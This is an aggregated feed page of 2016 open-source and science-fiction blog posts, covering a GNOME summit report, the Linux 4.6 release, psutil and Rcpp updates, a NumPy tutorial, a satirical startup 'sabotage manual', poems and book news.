Planet Mg

May 16, 2016

Planet GNOME

Amisha Singla: GNOME.Asia Summit 2016 - Planet GNOME

While I was going through news.gnome.org, a piece of news flashed on my screen: GNOME.Asia Summit 2016 was to be held in Delhi, India, which is my home town. At that time I was completely unaware of what happens at a summit, what it is meant for, and all those sorts of questions, but I decided to at least attend it, if not participate. I told my mentors, Jonas Danielsson and Damian Nohales, about the news. Initially I was quite reluctant to participate, but Jonas pushed me to present a lightning talk about my Outreachy project at the summit, and Damian too motivated me to go. So I decided to submit a lightning talk proposal about my project: "Adding print route support in GNOME-Maps". Within a few days I got confirmation that my talk had been accepted, along with approval of travel sponsorship.

I was all set to be part of the summit and quite excited to meet people whom I had known only by their nicks on IRC. The summit was held at Manav Rachna International University, Faridabad (India).

Day 1 consisted of workshops. The first session was divided according to the different ways in which one can contribute to GNOME (development, documentation, engagement), and the development group was branched further by the programming language one was interested in. Because of my interest in JavaScript, I joined Cosimo's team. The discussion turned out to be really helpful and cleared a lot of my doubts. Then there was a hands-on session on GStreamer given by Nirbheek and Arun, which was again an interesting one. Meanwhile I made many friends and exchanged ideas with them. Above all, the community felt very friendly, interesting and helpful.

Days 2 and 3 consisted of a lot of interesting talks by various speakers. It was my first experience delivering a talk at such a big summit. I was quite scared initially, but in the end it all went well. I felt glad that I was able to reach out to people and present my work clearly.

I was not aware of the Day 4 plan, an excursion trip, but when Shobha (the summit coordinator) asked me to join, I happily agreed. It was a fun-filled trip to the Taj Mahal in Agra. I got to know a lot about the cultures of different countries and made awesome friends.

This summit has been very helpful in giving me a feel for the GNOME community. After all, it's the people who make it. I am thankful to the GNOME community for making me a part of it and of the summit. :) Looking forward to more such meets. :)

by Amisha Singla (noreply@blogger.com) at 2016-05-16 07:59

Kevin and Kell

Greta departs - Kevin and Kell

Comic for Monday May 16th, 2016 - "Greta departs" [ view ]

On this day in 1996, after downloading the instructions off the net, Rudy splashes himself with some homemade pheromones to cheat on his test... [ view ]

Today's Daily Sponsor - MB says, "Thanks for K&K, Bill!" [ support ]

by Kevin and Kell at 2016-05-16 05:00

Planet Debian

Russ Allbery: Review: Gentleman Jole and the Red Queen - Planet Debian

Review: Gentleman Jole and the Red Queen, by Lois McMaster Bujold

Series: Vorkosigan #15
Publisher: Baen
Copyright: 2015
Printing: February 2016
ISBN: 1-4767-8122-2
Format: Kindle
Pages: 352

This is very late in the Vorkosigan series, but it's also a return to a different protagonist and a change of gears to a very different type of story. Gentleman Jole and the Red Queen has Cordelia as a viewpoint character for, I believe, the first time since Barrayar, very early in the series. But you would still want to read the intermediate Miles books before this one given the nature of the story Bujold is telling here. It's a very character-centric, very quiet story that depends on the history of all the Vorkosigan characters and the connection the reader has built up with them. I think you have to be heavily invested in this series already to get that much out of this book.

The protagonist shift has a mildly irritating effect: I've read the whole series, but I was still a bit adrift at times because of how long it's been since I read the books focused on Cordelia. I only barely remember the events of Shards of Honor and Barrayar, which lay most of the foundations of this story. Bujold does have the characters retell them a bit, enough to get vaguely oriented, but I'm pretty sure I missed some subtle details that I wouldn't have if the entire series were fresh in memory. (Oh for the free time to re-read all of the series I'd like to re-read.)

Unlike recent entries in this series, Gentleman Jole and the Red Queen is not about politics, investigations, space (or ground) combat, war, or any of the other sources of drama that have shown up over the course of the series. It's not even about a wedding. The details (and sadly even the sub-genre) are all spoilers, both for this book and for the end of Cryoburn, so I can't go into them here. But I'm quite curious how the die-hard Baen fans would react to this book. It's a bit far afield from their interests.

Gentleman Jole is all about characters: about deciding what one wants to do with one's life, about families and how to navigate them, about boundaries and choices. Choices about what to communicate and what not to communicate, and, partly, about how to maintain sufficient boundaries against Miles to keep his manic energy from bulldozing into things that legitimately aren't any of his business. Since most of the rest of the series is about Miles poking into things that appear to not be his business and finding ways to fix things, it's an interesting shift. It also cast Cordelia in a new light for me: a combination of stability, self-assurance, and careful and thoughtful navigation around others' feelings. Not a lot happens in the traditional plot sense, so one's enjoyment of this book lives or dies on one's investment in the mundane life of the viewpoint characters. It worked for me.

There is also a substantial retcon or reveal about an aspect of Miles's family that hasn't previously been mentioned. (Which term you use depends on whether you think Bujold has had this in mind all along. My money is on reveal.) I suspect some will find this revelation jarring and difficult to believe, but it worked perfectly for me. It felt like exactly the sort of thing that would go unnoticed by the other characters, particularly Miles: something that falls neatly into his blind spots and assumptions, but reads much differently to Cordelia. In general, one of the joys of this book for me is seeing Miles a bit wrong-footed and maneuvered by someone who simply isn't willing to be pushed by him.

One of the questions the Vorkosigan series has been asking since the start is whether anyone can out-maneuver Miles. Ekaterin only arguably managed it, but Gentleman Jole makes it clear that Miles is no match for his mother on her home turf.

This is a quiet and slow book that doesn't feel much like the rest of the series, but it worked fairly well for me. It's not up in the ranks of my favorite books of this series, partly because the way it played out was largely predictable and I never quite warmed to Jole, but Cordelia is delightful and seeing Miles from an outside perspective is entertaining. An odd entry in the series, but still recommended.

Rating: 7 out of 10

by Russ Allbery at 2016-05-16 03:59

Planet Ubuntu

José Antonio Rey: Ubuntu’s back at OSCON this year! - Planet Ubuntu

You read it right! After several years of being absent, Ubuntu is going to be present at OSCON this 2016. We are going to be there as a non-profit, so make sure you visit us at booth 631-3.

It has been several years since we had a presence as exhibitors, and I am glad to say we're going to have awesome things this year. It's also OSCON's first year in Austin. New year, new venue! But getting to the point, we will have:

  • System76 laptops so you can play with and experience Ubuntu Desktop
  • A couple Nexus 4 phones, so you can try out Ubuntu Touch
  • A bq M10 Ubuntu Edition tablet so you can see how beautiful it is, and see convergence in action (thanks Popey!)
  • A Mycroft! (Thanks to the Mycroft guys, can’t wait to see one in person myself!)
  • Some swag for free (first come-first serve basis, make sure to drop by!)
  • And a raffle for the Official Ubuntu Book, 8th Edition!

The conference starts Monday, May 16th (tomorrow!) but the Expo Hall opens on Tuesday night. You could say we start on Wednesday :) If you are going to be there, don't forget to drop by and say hi. It's my first time at OSCON, so we'll see how the conference is. I am pretty excited about it – hope to see several of you there!


by Planet Ubuntu at 2016-05-16 02:27

QC RSS

Lots Of Negatives - QC RSS



AAAA VanCAF is next weekend! I will be there! You should come say hi and buy stuff from me and my friends!!!!!!

by QC RSS at 2016-05-16 02:02

More Words, Deeper Hole

Nebula Award Winners Announced - More Words, Deeper Hole

The winners are:

Novel: Uprooted, Naomi Novik (Del Rey)

Novella: Binti, Nnedi Okorafor (Tor.com)

Novelette: "Our Lady of the Open Road", Sarah Pinsker (Asimov’s 6/15)

Short Story: "Hungry Daughters of Starving Mothers", Alyssa Wong (Nightmare 10/15)

Ray Bradbury Award for Outstanding Dramatic Presentation: Mad Max: Fury Road, written by George Miller, Brendan McCarthy, Nick Lathouris

Andre Norton Award for Young Adult Science Fiction and Fantasy: Updraft, Fran Wilde (Tor)

Other Awards: Gay Haldeman presented the Kevin O’Donnell, Jr. Service to SFWA Award to Dr. Lawrence M. Schoen.

Also posted at Dreamwidth; comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-16 00:29

May 15, 2016

LWN.net

The 4.6 kernel has been released - LWN.net

Linus has released the 4.6 kernel, saying: "It's just as well I didn't cut the rc cycle short, since the last week ended up getting a few more fixes than expected, but nothing in there feels all that odd or out of line." Some of the more significant changes in this release are: post-init read-only memory as a bare beginning of the effort to harden the kernel, support for memory protection keys, the preadv2() and pwritev2() system calls, the kernel connection multiplexer, the OrangeFS distributed filesystem, compile-time stack validation, the OOM reaper, and many more. See the KernelNewbies 4.6 page for an amazing amount of detail.

by corbet at 2016-05-15 23:11

The Endeavour

Bring out your equations! - The Endeavour

Nice discussion from Fundamentals of Kalman Filtering: A Practical Approach by Paul Zarchan and Howard Musoff:

Often the hardest part in Kalman filtering is the subject that no one talks about—setting up the problem. This is analogous to the quote from the recent engineering graduate who, upon arriving in industry, enthusiastically says, “Here I am, present me with your differential equations!” As the naive engineering graduate soon found out, problems in the real world are frequently not clear and are subject to many interpretations. Real problems are seldom presented in the form of differential equations, and they usually do not have unique solutions.

Whether it’s Kalman filters, differential equations, or anything else, setting up the problem is the hard part, or at least a hard part.

On the other hand, it’s about as impractical to only be able to set up problems as it is to only be able to solve them. You have to know what kinds of problems can be solved, and how accurately, so you can formulate a problem in a tractable way. There’s a feedback loop: provisional problem formulation, attempted solution, revised formulation, etc. It’s ideal when one person can set up and solve a problem, but it’s enough for the formulators and solvers to communicate well and have some common ground.

Related posts:

by John at 2016-05-15 22:53

Planet Debian

Bits from Debian: What does it mean that ZFS is included in Debian? - Planet Debian

Petter Reinholdtsen recently blogged about ZFS availability in Debian. Many people have worked hard on getting ZFS support available in Debian and we would like to thank everyone involved in getting to this point and explain what ZFS in Debian means.

The landing of ZFS in the Debian archive was blocked for years due to licensing problems. Finally, the inclusion of ZFS was announced slightly more than a year ago, in April 2015, by the DPL at the time, Lucas Nussbaum, who wrote: "We received legal advice from Software Freedom Law Center about the inclusion of libdvdcss and ZFS in Debian, which should unblock the situation in both cases and enable us to ship them in Debian soon." In January this year, the following DPL, Neil McGovern, blogged with a lot more detail about the legal situation behind this and summarized it as "TLDR: It’s going in contrib, as a source only dkms module."

Strictly speaking, ZFS is not available in Debian itself, since Debian is only what's included in the "main" section of the archive. What people really mean here is that the ZFS code is now included in "contrib" and is available to users via DKMS.

Many people have also conflated this with Ubuntu now including ZFS. However, Debian and Ubuntu are not doing the same thing: Ubuntu ships pre-built kernel modules directly, something that is considered to be a GPL violation. As the Software Freedom Conservancy wrote, ZFS, "while licensed under an acceptable license for Debian's Free Software Guidelines, also has a default use that can cause licensing problems for downstream Debian users".

by Ana Guerrero Lopez at 2016-05-15 20:55

Planet Python

Jonathan Hartley: Rhythmbox plugin: “Announce” - Planet Python

I use the Linux music player “Rhythmbox”. This morning I wrote a plugin for it, called “Announce”:

https://github.com/tartley/rhythmbox-plugin-announce

Every time a new song starts to play, it announces the title using speech synthesis. I like it when I’m listening to some new music I’m not familiar with, but am away from the computer. Then I can still know which track is which.

If the album or artist names are different from the previous track, then it includes those in the announcement, too.

by Planet Python at 2016-05-15 19:34

Charlie's Diary

Updating a classic - Charlie's Diary

In 1944, the Office of Strategic Services—the predecessor of the post-war CIA—was concerned with sabotage directed against enemies of the US military. Among their ephemera, declassified and published today by the CIA, is a fascinating document called the Simple Sabotage Field Manual (PDF). It's not just about blowing things up; a lot of its tips are concerned with how sympathizers with the allied cause can impair enemy material production and morale:

  1. Managers and Supervisors: To lower morale and production, be pleasant to inefficient workers; give them undeserved promotions. Discriminate against efficient workers; complain unjustly about their work.
  2. Employees: Work slowly. Think of ways to increase the number of movements needed to do your job: use a light hammer instead of a heavy one; try to make a small wrench do instead of a big one.
  3. Organizations and Conferences: When possible, refer all matters to committees, for "further study and consideration." Attempt to make the committees as large and bureaucratic as possible. Hold conferences when there is more critical work to be done.
  4. Telephone: At office, hotel and local telephone switchboards, delay putting calls through, give out wrong numbers, cut people off "accidentally," or forget to disconnect them so that the line cannot be used again.
  5. Transportation: Make train travel as inconvenient as possible for enemy personnel. Issue two tickets for the same seat on a train in order to set up an "interesting" argument.

Some of these sabotage methods are commonplace tactics deployed in everyday workplace feuds. It's often hard to know where incompetence ends and malice begins: the beauty of organizations is that most of them have no effective immune systems against such deliberate excesses of incompetence.

So it occurred to me a week or two ago to ask (on Twitter) the question: "what would a modern-day version of this manual look like if it was intended to sabotage a rival dot-com or high-tech startup company?" And the obvious answer is "send your best bad managers over to join in admin roles and run their hapless enemy into the ground". But what actual policies should they impose for best effect?

  1. Obviously, engineers and software developers (who require deep focus time) need to be kept in touch with the beating heart of the enterprise. So open-plan offices are mandatory for all.

  2. Teams are better than individuals and everyone has to be aware of the valuable contributions of employees in other roles. So let's team every programmer with a sales person—preferably working the phones at the same desk—and stack-rank them on the basis of each pair's combined quarterly contribution to the corporate bottom line.

  3. It is the job of Human Resources to ensure that nobody rocks the boat. Anyone attempting to blow whistles or complain of harassment is a boat-rocker. You know what needs to be done.

  4. Senior managers should all be "A" Players (per Jack Welch's vitality model—see "stack ranking" above) so we should promote managers who are energetic, inspirational, and charismatic risk-takers.

  5. The company must have a strong sense of intense focus. So we must have a clean desk policy—any personal possessions left on the desk or cubicle walls at the end of the day go in the trash. In fact, we can go a step further and institute hot desking—we will establish an average developer's workstation requirements and provide it for everyone at every desk.

  6. All work environments must be virtualized and stashed on the corporate file servers for safe-keeping. Once we've worked out how many VMs we need to run, we can get rid of the surplus hardware—redundancy is wasteful.

  7. Programmers don't need root/admin access to their development environments. Marketing, however, need to be able to manage the CRM and should have global admin permissions across the network.

  8. All communications within the company will be conducted using the corporation's own home-rolled secure instant messaging/email system. IT Services are hard at work porting the PocketPC 2006 Second Edition client to Android 2.2 and Windows Vista; it should be available any day now, at which point the iPaqs and XP boxes will be sunsetted. (This has the added benefit of preventing the developers from sneaking Macs or Linux systems into the office.)

  9. Stand-up meetings will be scheduled every morning, to allow the development team to share insights and situational awareness. To ensure that everybody has their say everybody will be allocated exactly the same amount of time to speak. If they don't have anything to fill the silence with, we will wait it out, to encourage slow thinkers to keep up.

  10. If a project is running late, then everybody in the department will move to a death-march overtime tempo and pitch in until it's done, shelving their own jobs and switching tasks if necessary. If a death march is established and still fails to produce deliverables on time, then as punishment the coffee in the departmental cafetiere will be switched to decaff.



Okay. What can you add to this dot-com sabotage manual? (No more than one bullet point per comment, no more than three comments per day, so there's room for everyone! Alan, this is your cue for variations on full-stack Javascript plus NoSQL ...)

by Charlie Stross at 2016-05-15 17:49

Making Light

Serving and protecting - Making Light

Another day, another video of police beating and tasing civilians, in this case a 15-year-old Tacoma girl who cut across...

by Patrick Nielsen Hayden at 2016-05-15 17:27

Bluejo's Journal

Sunday Morning, Saint Malo, Two sonnets - Bluejo's Journal

1. Joy

It's early Sunday, down here on the sand
There's no horizon, only shades of blue
Dotted with islands, and the inland view
Two castles, one cathedral, and the strand.

The sea-washed sand-grains glitter like panned gold
And sailing out, a single white-sailed yacht
And its reflection -- and how have I got
So lucky, to have this to see and hold.

How did my life lead here, so I could be
Here in this town, this life, this world, these friends,
This early morning walk beside the sea?

So lucky, lucky that my life now lends
This joy of being here, and being free
To see and love so much, before all ends.

2. Sorrow.

I met a woman walking in the waves
"Bonjour," "Bonjour," "Vous etes Anglais?"
"Oui, suis," and then a tale burst out a weird way
I couldn't understand, that featured graves.

She asked was I a writer, I "I am,"
And then she told me that her son had died.
To illness. He was ten. And then she cried.
And I said "Ah! Je n'ai pas mots, Madame."

No words in French or English actually
In face of such a grief, nothing that may
Reach out across the gulf from her to me.

"J'ai perdu ma soeur, a onze. Je sais.
Nous oublies jamais." I said. The sea
Kept making waves. And she said "Oui. Jamais."

All totally true, including my utterly crap French, which I have deliberately left as it is. Actually our conversation was slightly longer -- she recognised the festival ribbon and asked if I was here for Etonnants Voyageurs before she asked whether I was a writer.

I sat down on the steps and wrote these in my notebook on the beach, and got the seat of my pants slightly wet, but it was worth it.

Sponsored by the wonderful Patrons of my Patreon.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-15 17:25

Making Light

On sale, um, now, Harry Turtledove's The House of Daniel - Making Light

[Yes, this post should have gone up on April 21. See Available in hardcover and e-book. Excerpt here. My...

by Patrick Nielsen Hayden at 2016-05-15 16:15

More Words, Deeper Hole

Dune by Frank Herbert - More Words, Deeper Hole



Dune by Frank Herbert

Also posted at Dreamwidth; comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-15 14:39

Planet Python

Python 4 Kids: Python for Kids Book: Project 5 - Planet Python

In these posts I outline the contents of each project in my book Python For Kids For Dummies.  If you have questions or comments about the project listed in the title post them here. Any improvements will also be listed here.

What’s in Project 5

Project 5 introduces functions by revisiting the Guessing Game from Project 3 and recasting it using a function. The project covers the def keyword, calling a function, and the fact that a function must be defined before it can be called. The project also covers how to communicate with a function (both sending information to it by passing parameters and getting information from it using the return keyword). In order to define a function, you need to give it a name, so the project sets out naming rules for functions. You should also be documenting your code, so the project introduces docstrings: how to create them, what to put in them and how to use them.

The project illustrates a logical problem in the code and explains what a local variable is. It introduces the concept of constants defined in the body of a program that can be accessed by code within a function. A function which conducts the game round is put inside a while loop, and the user interface is changed to allow the user to exit the loop. This involves creating a quit function which first checks with the user to confirm that they want to quit, then using the break keyword to break out of the loop, or the continue keyword if the user aborts the quit. The sys module is introduced in order to use sys.exit.
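
To give a feel for the overall shape being described, here is a rough sketch of such a program. This is not the book's code; the range, messages and structure are made up, and it is written for Python 3 (use raw_input in place of input on Python 2.7):

import random
import sys

LOWEST = 1    # constants defined in the body of the program;
HIGHEST = 10  # the functions below can read them

def do_round():
    """Play one round: pick a secret number and take a guess at it."""
    secret = random.randint(LOWEST, HIGHEST)
    guess = int(input("Guess a number from %s to %s: " % (LOWEST, HIGHEST)))
    if guess == secret:
        print("You got it!")
    else:
        print("No, it was %s." % secret)

def confirm_quit():
    """Check that the player really wants to stop; return True to quit."""
    answer = input("Really quit? (y/n) ")
    return answer.lower().startswith("y")

while True:
    do_round()
    if input("Type q to quit, anything else to play again: ") == "q":
        if confirm_quit():
            break      # leave the while loop and end the game
        else:
            continue   # abort the quit and go round again

print("Thanks for playing!")
sys.exit()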

Improvements:

The name of the project is actually “A More Functional Guessing Game” – named as such since it will be using a function to make the guessing game work better, but some editor somewhere had a humor transplant and changed that title.

The callout on Figure 5-4 should read “The right place for an argument.”  They completely ruined that pun <sigh>


by Planet Python at 2016-05-15 13:06

Python 4 Kids: Python for Kids: Python 3 – Project 4 - Planet Python

Disclaimer

Some people want to use my book Python for Kids for Dummies to learn Python 3. I am working through the code in the existing book, highlighting changes from Python 2 to Python 3 and providing code that will work in Python 3.

If you are using Python 2.7 you can ignore this post. This post is only for people who want to take the code in my book Python for Kids for Dummies and run it in Python 3.

Using Python3 in Project 4 of Python For Kids For Dummies

Project 4 introduces the IDLE integrated development environment. When you download and install a version of Python 3 for Windows (I tested version 3.4.4)  you should get a folder called Python 3.4 (or whatever version you installed) in your Start Menu.  In that folder should be an entry called IDLE (Python 3.4 GUI – 32 bit).  If you run that you will be launched into the Python 3.4 equivalent of the IDLE mentioned in the book.

The good news is that pretty much everything in this project is the same for Python 3. That’s partly because the project is mainly concerned with introducing the IDLE environment and the concept of storing code in a file.  IDLE in Python 3 has all of the features listed in Project 4 as for Python 2.7:

Syntax highlighting (page 87)

Tab Completion (page 88/89)

Command history (page 90/91)

The IDLE Editor Window (page 92-95)

Comments (page 95-98)

Saving files (page 98)

Commenting out code (page 98-100) (the commenting formats, # and triple-quoted docstrings """, are the same in Python 3)

Indenting and dedenting code (page 101-102)

You should be able to breeze through Project 4 using Python 3.


by Planet Python at 2016-05-15 13:00

Planet Debian

Sven Hoexter: Failing with F5: ASM default ruleset vs curl - Planet Debian

Not sure what to say on days when the default ruleset of a "web application firewall" denies access to curl, and the circumvention is as complicated as:

alias curl-vs-asm="curl -A 'Mozilla'"

It starts to feel like wasting my lifetime when I see something like that. Otherwise I like my job (that's without irony!).

Update: Turns out it's even worse. They specifically block curl. Even

curl -A 'A' https://wherever-asm-is-used.example

works.

by Sven Hoexter at 2016-05-15 11:16

Planet Python

Giampaolo Rodola: psutil 4.2.0, Windows services and Python - Planet Python

New psutil 4.2.0 is out. The main feature of this release is the support for Windows services:

>>> import psutil
>>> list(psutil.win_service_iter())
[<WindowsService(name='AeLookupSvc', display_name='Application Experience') at 38850096>,
<WindowsService(name='ALG', display_name='Application Layer Gateway Service') at 38850128>,
<WindowsService(name='APNMCP', display_name='Ask Update Service') at 38850160>,
<WindowsService(name='AppIDSvc', display_name='Application Identity') at 38850192>,
...]
>>> s = psutil.win_service_get('alg')
>>> s.as_dict()
{'binpath': 'C:\\Windows\\System32\\alg.exe',
'description': 'Provides support for 3rd party protocol plug-ins for Internet Connection Sharing',
'display_name': 'Application Layer Gateway Service',
'name': 'alg',
'pid': None,
'start_type': 'manual',
'status': 'stopped',
'username': 'NT AUTHORITY\\LocalService'}

I did this mainly because I find the pywin32 APIs too low level. Having something like this in psutil can be useful for discovering and monitoring services more easily. The code changes are here and here's the doc. The API for querying a service is similar to psutil.Process. You can get a reference to a service object by using its name (which is unique for every service) and then use name(), status(), etc.:

>>> s = psutil.win_service_get('alg')
>>> s.name()
'alg'
>>> s.status()
'stopped'

Initially I thought about exposing a complete set of APIs to handle all aspects of service handling, including start(), stop(), restart(), install(), uninstall() and modify(), but I soon realized that I would have ended up reimplementing what pywin32 already provides, at the cost of overcrowding the psutil API (see my reasoning here). I think psutil should really be about monitoring, not about installing and modifying system stuff, especially something as critical as a Windows service.

Considerations about Windows services

For those of you who are not familiar with Windows, a service is something, generally an executable (.exe), which runs at system startup and keeps running in the background. We can say they are the equivalent of a UNIX init script. All services are controlled by a "manager" which keeps track of their status and metadata (e.g. description, startup type) and with which you can start and stop them. It is interesting to note that since (most) services are bound to an executable (and hence a process), you can reference the process via its PID:

>>> s = psutil.win_service_get('sshd')
>>> s
<WindowsService(name='sshd', display_name='Open SSH server') at 38853046>
>>> s.pid()
1865
>>> p = psutil.Process(1865)
>>> p
<psutil.Process(pid=1865, name='sshd.exe') at 140461487781328>
>>> p.exe()
'C:\CygWin\bin\sshd'

Other improvements

psutil 4.2.0 comes with 2 other enhancements for Linux:
  • psutil.virtual_memory() returns a new "shared" memory field. This is the same value reported by the "free" command-line utility (a short sketch of reading it follows this list).
  • I changed the way /proc is parsed. Instead of reading /proc/{pid}/status line by line, I now use a regular expression. Here are the speedups:
    * Process.ppid() is 20% faster
    * Process.status() is 28% faster
    * Process.name() is 25% faster
    * Process.num_threads() is 20% faster (on Python 3 only; on Python 2 it's a bit slower - I suppose the re module received some improvements)
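
Here is the short sketch mentioned above. It is only an illustration (not from the release notes) and assumes Linux with psutil 4.2.0 or later:

import psutil

# New in 4.2.0 (Linux): the "shared" field, the same figure that the
# "free" command shows in its "shared" column.
vm = psutil.virtual_memory()
print(vm.shared)
print(vm.total, vm.available, vm.percent)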

Links

by Planet Python at 2016-05-15 10:37

Kevin and Kell

Next year's roommate - Kevin and Kell

Comic for Sunday May 15th, 2016 - "Next year's roommate" [ view ]

On this day in 1997, Rudy found himself in the awkward situation of coaching Ms. Aura through the birth of her baby hatchling, Nigel... [ view ]

Today's Daily Sponsor - MB says, "Thanks for K&K, Bill!" [ support ]

by Kevin and Kell at 2016-05-15 05:00

Planet Debian

Norbert Preining: Foreigners in Japan are evil … - Planet Debian

…at least that is what Tokyo's Shinjuku ward believes. They have put out a very nice brochure about how to behave as a foreigner in Japan: English (local copy) and Japanese (local copy). Nothing in there is really bad, but the tendency is so clear that it makes me think: what on earth do you believe we are doing in this country?

Now what is so strange about that? If you have never lived in Japan you will probably not understand. But reading through this pamphlet I felt like a criminal from the first page on. If you don't want to read through it, here is a short summary:

  • The first four pages (1-4) deal with manners, accompanied by penal warnings for misbehavior.
  • Pages 5-16 deal with criminal records, stating the terms of imprisonment and fines for various offences.
  • Pages 17-19 deal with the residence card, again paired with listings of criminal offences and fines.
  • Pages 20-23 deal with reporting obligations, again ….
  • And finally page 24 gives you phone numbers for accidents, fires, injury, and general information.

So if you add it up, we have 23 pages of warnings, and 1 (as in *one*) page of practical information. Do I need to say more about how we foreigners are regarded in Japan?

Just a few points about details:

  • In the section on manners, not talking on the phone on public transport is mentioned – I have to say, after many years here I am still waiting to see my first foreigner talking loudly on the phone, while Japanese regularly chat away at high volume.
  • Again in the manners section: don't make noise in your flat – well, I lived for 3 years in an apartment where the person below me enjoyed playing loud music in the car till late at night, as well as moving furniture at 3am.
  • Bicycle riding – ohhh, bicycle riding – those 80+ people meandering around the street, and the school kids riding four abreast. But hey, we foreigners are required to behave differently. Not that any police officer ever stopped a Japanese school kid for that …
  • I just realized that I have been doing illegal things for a long time – withdrawing money using someone else's cash card! Damn, it was my wife's, but still, too bad 🙁

I accept the good intentions of the Shinjuku ward in offering a bit of warning and guidance. But the way it was done speaks volumes about how we foreigners are treated: second class.

by Norbert Preining at 2016-05-15 03:07

More Words, Deeper Hole

The Cougar's Mighty Roar - More Words, Deeper Hole



Also posted at Dreamwidth; comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-15 02:49

Planet Debian

Jonathan Dowland: Announcement - Planet Debian

It has become a bit traditional within Debian to announce these things in a geeky manner, so for now

# ed -p: /etc/exim4/virtual/dow.land
:a
holly: :fail: reserved for future use
.
:wq
99

More soon!

by jmtd at 2016-05-15 02:11

Dirk Eddelbuettel: Rcpp 0.12.5: Yet another one - Planet Debian

The fifth update in the 0.12.* series of Rcpp arrived on the CRAN network for GNU R a few hours ago, and was just pushed to Debian. This 0.12.5 release follows the 0.12.0 release from late July, the 0.12.1 release in September, the 0.12.2 release in November, the 0.12.3 release in January, and the 0.12.4 release in March, making it the ninth release at the steady bi-monthly release frequency. This release is once again more of a maintenance release, addressing a number of small bugs, nuisances or documentation issues without adding any major new features.

Rcpp has become the most popular way of enhancing GNU R with C or C++ code. As of today, 662 packages on CRAN depend on Rcpp for making analytical code go faster and further. That is up by almost fifty packages from the last release in late March!

As during the last few releases, we have new first-time contributors. Sergio Marques helped to enable compilation on Alpine Linux (with its smaller libc variant). Qin Wenfeng helped adapt for Windows builds under R 3.3.0 and the long-awaited new toolchain. Ben Goodrich fixed a (possibly ancient) Rcpp Modules bug he encountered when working with rstan. Recurrent contributor Dan Dillon cleaned up an issue with Nullable and strings. Rcpp Core team members Kevin and JJ took care of a small build nuisance on Windows, and I added a new helper function, updated the skeleton generator and (finally) formally deprecated loadRcppModules(), for which loadModule() has been preferred since around R 2.15 or so. More details and links are below.

Changes in Rcpp version 0.12.5 (2016-05-14)

  • Changes in Rcpp API:

    • The checks for different C library implementations now also check for Musl used by Alpine Linux (Sergio Marques in PR #449).

    • Rcpp::Nullable works better with Rcpp::String (Dan Dillon in PR #453).

  • Changes in Rcpp Attributes:

    • R 3.3.0 Windows with Rtools 3.3 is now supported (Qin Wenfeng in PR #451).

    • Correct handling of dependent file paths on Windows (use winslash = "/").

  • Changes in Rcpp Modules:

    • An apparent race condition in Module loading seen with R 3.3.0 was fixed (Ben Goodrich in #461 fixing #458).

    • The (older) loadRcppModules() is now deprecated in favour of loadModule() introduced around R 2.15.1 and Rcpp 0.9.11 (PR #470).

  • Changes in Rcpp support functions:

    • The Rcpp.package.skeleton() function was again updated in order to create a DESCRIPTION file which passes R CMD check without notes, warnings, or errors under R-release and R-devel (PR #471).

    • A new function compilerCheck can test for minimal g++ versions (PR #474).

Thanks to CRANberries, you can also look at a diff to the previous release. As always, even fuller details are on the Rcpp Changelog page and the Rcpp page which also leads to the downloads page, the browseable doxygen docs and zip files of doxygen output for the standard formats. A local directory has source and documentation too. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

by Dirk Eddelbuettel at 2016-05-15 01:54

Planet Python

Jamal Moir: An Introduction to Scientific Python (and a Bit of the Maths Behind It) - NumPy - Planet Python


Oh the amazing things you can do with Numpy.

NumPy is a blazing fast maths library for Python with a heavy emphasis on arrays. It allows you to do vector and matrix maths within Python and as a lot of the underlying functions are actually written in C, you get speeds that you would never reach in vanilla Python.

NumPy is an absolutely key piece of the success of scientific Python, and if you want to get into Data Science and/or Machine Learning in Python, it's a must-learn. NumPy is well built in my opinion, and getting started with it is not difficult at all.

This is the second post in a series of posts on scientific Python, don't forget to check out the others too. An up-to-date list of posts in this series is at the bottom of this post.

ARRAY BASICS

Creation

NumPy revolves around these things called arrays. Actually ndarrays, but we don't need to worry about that. With these arrays we can do all sorts of useful things like vector and matrix maths at lightning speeds. Get your linear algebra on! (Just kidding, we won't be doing any heavy maths.)

# 1D Array
a = np.array([0, 1, 2, 3, 4])
b = np.array((0, 1, 2, 3, 4))
c = np.arange(5)
d = np.linspace(0, 2*np.pi, 5)

print(a) # >>>[0 1 2 3 4]
print(b) # >>>[0 1 2 3 4]
print(c) # >>>[0 1 2 3 4]
print(d) # >>>[ 0. 1.57079633 3.14159265 4.71238898 6.28318531]
print(a[3]) # >>>3
The above code shows 4 different ways of creating an array. The most basic way is just passing a sequence to NumPy's array() function; you can pass it any sequence, not just lists like you usually see.

Notice how when we print an array with numbers of different lengths, it automatically pads them out. This is useful for viewing matrices. Indexing on arrays works just like that of a list or any other Python sequence. You can also use slicing on them. I won't go into slicing a 1D array here; if you want more information on slicing, check out this post.

The above array example is how you can represent a vector with NumPy, next we will take a look at how we can represent matrices and more with multidimensional arrays.

# MD Array,
a = np.array([[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25],
[26, 27, 28 ,29, 30],
[31, 32, 33, 34, 35]])

print(a[2,4]) # >>>25
To create a 2D array we pass the array() function a list of lists (or a sequence of sequences). If we wanted a 3D array we would pass it a list of lists of lists, a 4D array would be a list of lists of lists of lists and so on.

Notice how a 2D array (with the help of our friend the space bar) is arranged in rows and columns. To index a 2D array we simply reference a row and a column.

A Bit of the Maths Behind It

To understand this properly, we should really take a look at what vectors and matrices are.

A vector is a quantity that has both direction and magnitude. They are often used to represent things such as velocity, acceleration and momentum. Vectors can be written in a number of ways although the one which will be most useful to us is the form where they are written as an n-tuple such as (1, 4, 6, 9). This is how we represent them in NumPy.

A matrix is similar to a vector, except it is made up of rows and columns; much like a grid. The values within the matrix can be referenced by giving the row and the column that it resides in. In NumPy we make arrays by passing a sequence of sequences as we did previously.



Multidimensional Array Slicing

Slicing a multidimensional array is a bit more complicated than a 1D one and it's something that you will do a lot while using NumPy.

# MD slicing
print(a[0, 1:4]) # >>>[12 13 14]
print(a[1:4, 0]) # >>>[16 21 26]
print(a[::2,::2]) # >>>[[11 13 15]
# [21 23 25]
# [31 33 35]]
print(a[:, 1]) # >>>[12 17 22 27 32]
